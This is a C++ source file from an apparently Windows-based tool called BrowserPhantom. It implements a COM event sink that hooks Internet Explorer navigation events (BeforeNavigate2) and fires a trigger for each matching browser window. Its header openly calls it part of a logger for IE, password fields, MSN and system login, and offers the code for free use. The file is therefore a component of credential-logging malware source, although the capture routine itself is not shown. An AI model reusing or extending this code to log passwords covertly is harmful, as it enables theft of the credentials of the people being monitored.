// InterceptEvt.cpp: implementation of the CInterceptEvt class.
//
//////////////////////////////////////////////////////////////////////

#include "BrowserPhantomDLLStdAfx.h"
#include "WebEventInterceptor.h"
#include "ComDef.h"
#include "BrowserPhantom.h"
/************************************
  REVISION LOG ENTRY
  Revision By: Zhang, Zhefu
  E-mail: codetiger@hotmail.com
  Revised on 7/3/2003 
  Comment: This is part of the logger for IE, password edit, MSN, system login.
           You are free to use to use the code on the base of keeping this comment
		   All rights reserved. May not be sold for profit.
 ************************************/

//#include <Mshtml.h>  //include the event uuid
//#include <mshtmdid.h> //include disp id
#include <ExDispID.h>

#ifdef _DEBUG
#undef THIS_FILE
static char THIS_FILE[]=__FILE__;
#define new DEBUG_NEW
#endif

//////////////////////////////////////////////////////////////////////
// Construction/Destruction
//////////////////////////////////////////////////////////////////////

ULONG CInterceptEvt::AddRef()
{
	return ++m_cRef;
}

ULONG CInterceptEvt::Release()
{
	if(--m_cRef != 0)
		return m_cRef;
	m_pTypeInfo->Release();
	delete this;
	return 0;
}

HRESULT CInterceptEvt::QueryInterface(REFIID riid, void** ppv)
{
	if(riid == IID_IUnknown)
		*ppv = (IUnknown*)this;
	else if(riid == IID_IDispatch)
		*ppv = (IDispatch*)this;
	else 
	{
		*ppv = NULL;
		return E_NOINTERFACE;
	}
	AddRef();
	return S_OK;
}

BOOL CInterceptEvt::Init(void)
{
	return TRUE;
//	ITypeLib* pTypeLib;
//	if(FAILED(LoadRegTypeLib(LIBID_Component, 1, 0, LANG_NEUTRAL, &pTypeLib)))
//		return false;
//	HRESULT hr = pTypeLib->GetTypeInfoOfGuid(IID_SomeInterface, &m_pTypeInfo);
//	pTypeLib->Release();
//	if(FAILED(hr))
//		return false;
//	return true;
}

HRESULT CInterceptEvt::GetTypeInfoCount(UINT* pCountTypeInfo)
{
//	*pCountTypeInfo = 1;
	*pCountTypeInfo = 0;
	return S_OK;
}

HRESULT CInterceptEvt::GetTypeInfo(UINT iTypeInfo, LCID lcid, ITypeInfo** ppITypeInfo)
{
//	*ppITypeInfo = NULL;
//	if(iTypeInfo != 0)
//		return DISP_E_BADINDEX;
//	m_pTypeInfo->AddRef();
//	*ppITypeInfo = m_pTypeInfo;
	return S_OK;
}

HRESULT CInterceptEvt::GetIDsOfNames(REFIID riid, LPOLESTR* rgszNames, UINT cNames, LCID lcid, DISPID* rgDispId)
{
	return S_OK;
//	if(riid != IID_NULL)
//		return DISP_E_UNKNOWNINTERFACE;
//	return DispGetIDsOfNames(m_pTypeInfo, rgszNames, cNames, rgDispId);
}

////////////////////////////////////////////////////////////////////
//EXTERN_C const IID DIID_HTMLFormElementEvents;
//
//#if defined(__cplusplus) && !defined(CINTERFACE)
//
//    interface DECLSPEC_UUID("3050f364-98b5-11cf-bb82-00aa00bdce0b")
//    HTMLFormElementEvents : public IDispatch
//    {
//    };

void CInterceptEvt::ConnectEvents(DWORD dwIndex)
{
	if(m_ppBrowser[dwIndex] == NULL) return;
	IConnectionPointContainer* pCPContainer;
 
    // Step 1: Get a pointer to the connection point container
    HRESULT hr = m_ppBrowser[dwIndex]->QueryInterface(IID_IConnectionPointContainer, 
                                           (void**)&pCPContainer);

    if (SUCCEEDED(hr))
    {
        // m_pConnectionPoint is defined like this:
        // IConnectionPoint* m_pConnectionPoint;
 
		WCHAR strEvent[] = L"{3050f364-98b5-11cf-bb82-00aa00bdce0b}";
	    //LPOLESTR = WCHAR

    	CLSID uuidEvent;
		HRESULT hrEvent = CLSIDFromString((LPOLESTR)strEvent, &uuidEvent);
	    //ASSERT(SUCCEEDED(hrEvent));

        // Step 2: Find the connection point
        hr = pCPContainer->FindConnectionPoint( 
			//DIID_HTMLFormElementEvents,
			//uuidEvent,
			DIID_DWebBrowserEvents2,
			&m_ppConnectionPoint[dwIndex]);
        if (SUCCEEDED(hr))
        {
           // Step 3: Advise
           hr = m_ppConnectionPoint[dwIndex]->Advise(this, &m_dwCookie[dwIndex]);
           if (FAILED(hr))
           {
               PopMsg(_T("Failed to Advise %d"), dwIndex);
           }
		   else
		   {
			   //PopMsg(_T("ConnectEvents OK Index %d"), dwIndex);
		   }
		}
        pCPContainer->Release();
		return; 
    }
	::ReportErr(_T("ConnectEvents"));	
}

void CInterceptEvt::ExitEvents(DWORD dwIndex)
{
	// Step 5: Unadvise
    if (m_ppConnectionPoint[dwIndex])
    {
       HRESULT hr = m_ppConnectionPoint[dwIndex]->Unadvise(m_dwCookie[dwIndex]);
       if (FAILED(hr))
       {
          //PopMsg(_T("Failed to Unadvise"));
       }
    }
}

void CInterceptEvt::SetSource(IWebBrowser2Ptr pBrowser, DWORD dwIndex)
{
	//PopMsg(_T("SetSource Index %d - lpWeb2%lp"), dwIndex, pBrowser);
	m_ppBrowser[dwIndex] = pBrowser;
}

HRESULT CInterceptEvt::Invoke(DISPID dispidMember,
                        REFIID riid,
                        LCID lcid, WORD wFlags,
                        DISPPARAMS* pDispParams,
                        VARIANT* pvarResult,
                        EXCEPINFO*  pExcepInfo,
                        UINT* puArgErr)
{
	if (!pDispParams)
           return E_INVALIDARG;
 
    switch (dispidMember)
    {
		// The parameters for this DISPID are as follows:
        // [0]: Cancel flag  - VT_BYREF|VT_BOOL
        // [1]: HTTP headers - VT_BYREF|VT_VARIANT
        // [2]: Address of HTTP POST data  - VT_BYREF|VT_VARIANT 
        // [3]: Target frame name - VT_BYREF|VT_VARIANT 
        // [4]: Option flags - VT_BYREF|VT_VARIANT
        // [5]: URL to navigate to - VT_BYREF|VT_VARIANT
        // [6]: An object that evaluates to the top-level or frame
        //      WebBrowser object corresponding to the event. 
        // [6]: type = 9 VT_DISPATCH
        case DISPID_BEFORENAVIGATE2:
//			PopMsg(_T("DISPID_BEFORENAVIGATE2 %d, %d"),
//				pDispParams->cArgs,
//				pDispParams->rgvarg[6].vt);
			if (pDispParams->cArgs >= 6 &&
               pDispParams->rgvarg[6].vt == VT_DISPATCH)
			{
				IDispatch *pDispVal = &(*pDispParams->rgvarg[6].pdispVal);
                for(int i = 0; i < MAX_BROWSER; i++)
				{
					if(m_ppBrowser[i])
					{
						IUnknown* pUnk1;
						IUnknown* pUnk2;
						HRESULT hr1 = m_ppBrowser[i]->QueryInterface(IID_IUnknown, 
                                           (void**)&pUnk1);
						HRESULT hr2 = pDispVal->QueryInterface(IID_IUnknown, 
                                           (void**)&pUnk2);
						if(pUnk1 == pUnk2)
						{
							//PopMsg(_T("Index %d BeforeTrigger"), i);
							Trigger(i);
							//
							//PopMsg(_T("Index %d AfterTrigger"), i);
							break;
						}
					}
				}
			}

            break;    
        default:
           break;
    }
	return S_OK;
}
